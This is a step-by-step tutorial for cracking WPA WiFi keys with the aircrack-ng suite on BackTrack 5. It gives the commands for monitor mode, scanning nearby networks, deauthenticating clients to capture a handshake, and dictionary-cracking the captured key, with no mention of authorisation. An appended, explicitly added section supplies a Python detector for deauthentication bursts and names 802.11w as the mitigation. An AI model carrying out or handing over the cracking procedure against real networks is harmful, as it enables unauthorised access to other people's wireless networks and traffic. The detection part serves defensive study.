Cracking WPA:
Using BackTrack 5 R1 (Aircrack-ng)
1. Open a terminal (i.e. a command prompt).
2. Type airmon-ng
   - to check whether the wlan card is supported or not;
   - to check the chipset of the wlan card (e.g. Atheros, Zydas, Intel);
   - to find the wlan card's interface name (e.g. wlan0).
3. Type airmon-ng start wlan0
   - to enable monitor mode on wlan0 (this creates mon0);
   - mon0 is the monitor-mode interface created on top of your wlan card wlan0.
4. Type airodump-ng mon0
   - to show the packets flowing in the nearby wifi networks together with each network's BSSID (MAC address) and channel.
5. Type aireplay-ng -0 5 -a "bssid" wlan0
   - -0 sends "deauth" (deauthentication) broadcast messages to the WiFi network in order to capture a handshake.
   - This attack sends disassociation packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:
     - recovering a hidden ESSID, i.e. an ESSID which is not being broadcast (another term for this is "cloaked");
     - capturing WPA/WPA2 handshakes by forcing clients to reauthenticate;
     - generating ARP requests (Windows clients sometimes flush their ARP cache when disconnected).
6. Type airodump-ng -w "filename" -c "channel" --bssid "MAC Address" mon0
   - This command captures packets from the wifi network whose BSSID and channel you provide and writes them to a file.
7. Finally, type aircrack-ng "filename-01.cap" -w "Path to the Wordlist"
   - It tries to crack the WPA key from the capture file by testing every candidate key in the wordlist file. If the key is present in the wordlist your key is recovered; otherwise it is not.
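The deauthentication burst sent in step 5 is also the loudest part of this procedure on the air, and it is what a wireless IDS looks for. The following is an added example, not part of the original tutorial: a small Python detector that reads constructed 802.11 management-frame records (timestamp, subtype, sender BSSID, destination; the field layout and sample values are assumptions for the example) and flags any sender that emits a burst of deauth/disassoc frames inside a short time window.

```python
# Added example (not from the original tutorial): flag deauthentication bursts
# of the kind aireplay-ng -0 produces. Input records are constructed here;
# a real deployment would feed them from a monitor-mode capture or a WIDS.
from collections import deque, defaultdict

# 802.11 management-frame subtypes.
BEACON = 0x08
DISASSOC = 0x0A
DEAUTH = 0x0C

# Constructed sample: (timestamp_seconds, subtype, sender_bssid, destination).
# One AP address sends a rapid broadcast-deauth burst; a second one sends a
# single deauth much later, which is normal client-management behaviour.
SAMPLE_FRAMES = [
    (100.00, BEACON, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (100.10, DEAUTH, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (100.11, DEAUTH, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (100.12, DEAUTH, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (100.13, DEAUTH, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (100.14, DEAUTH, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff"),
    (101.00, BEACON, "aa:bb:cc:dd:ee:02", "ff:ff:ff:ff:ff:ff"),
    (130.00, DEAUTH, "aa:bb:cc:dd:ee:02", "11:22:33:44:55:66"),
]


def detect_deauth_bursts(frames, window=2.0, threshold=4):
    """Return {sender_bssid: time_of_first_alert} for every sender whose
    deauth/disassoc count within any `window`-second span reaches `threshold`."""
    recent = defaultdict(deque)  # sender -> timestamps of recent deauths
    alerts = {}
    for ts, subtype, sender, _dst in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[sender]
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= threshold and sender not in alerts:
            alerts[sender] = ts
    return alerts


if __name__ == "__main__":
    for sender, when in detect_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst from {sender} starting at t={when:.2f}s")
```

A threshold detector like this cannot tell a spoofed deauth from a genuine one, since both carry the AP's address; the mitigation that removes the attack itself is 802.11w Protected Management Frames, which makes unauthenticated deauth/disassoc frames unverifiable to the client.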
Contact => www.facebook.com/ryan.manjothi